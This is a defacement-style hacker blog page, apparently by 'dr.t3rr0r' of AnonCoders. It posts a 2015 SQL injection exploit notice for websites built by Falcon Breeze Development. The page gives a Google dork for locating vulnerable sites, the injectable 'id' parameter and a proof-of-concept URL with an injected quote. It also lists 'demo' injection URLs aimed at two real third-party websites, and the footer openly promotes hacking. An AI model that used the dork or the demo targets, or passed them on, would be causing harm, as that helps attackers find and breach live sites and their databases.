dr.t3rr0r
Official Website


today : | at : | safemode : ON
> / home / terror / public_html /
name author perms com modified label

Falcon Breeze Development Sql Injection Vulnerablity dr.t3rr0r rwxr-xr-x 0 2:37 AM

Filename Falcon Breeze Development Sql Injection Vulnerablity
Permission rw-r--r--
Author dr.t3rr0r
Date and Time 2:37 AM
Label
Action
[#] Exploit Title : Falcon Breeze Development Sql Injection Vulnerablity



[#] Exploit Author : dr.t3rr0r ( AnonCoders )



[#] Vendor Homepage : http://www.falconbreeze.com



[#] Google Dork : intext:"Developing in Progress by Falcon Breeze."



[#] Date: 2015-08-02



[#] Tested On : Windows , Linux



=========================================================



[+] Severity Level          :- High





[+] Request Method(s)       :- GET / POST





[+] Vulnerable Parameter(s) :- id





[+] Affected Area(s)        :- Entire admin, database, Server







[+] POC                     :- http://127.0.0.1/XXX.php?page=[SQL]'



The sql Injection web vulnerability can be be exploited by remote

attackers without any privilege of web-application user account or

user interaction.



Error is Like Below.

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL

result resource in /home/falconbr/public_html/files/new_detail.php on

line 16



[#] Demos :



http://www.ama.org.mm/index.php?page=postdetail&id=7'



http://www.falconbreeze.com/index.php?page=detail&new=133'





[#] Greetz To : AnonCoders Team



[#] Discovered by : dr.t3rr0r
 
 
Exploit4Arab 

0 comments:

Post a Comment

 

Template © IT is Unknown! Use To Learn ! Learn to Hack ! Hack to Learn ! Hack to Use ! | by dr.t3rr0r |
VB (Vio b374k) Template design by dr.t3rr0r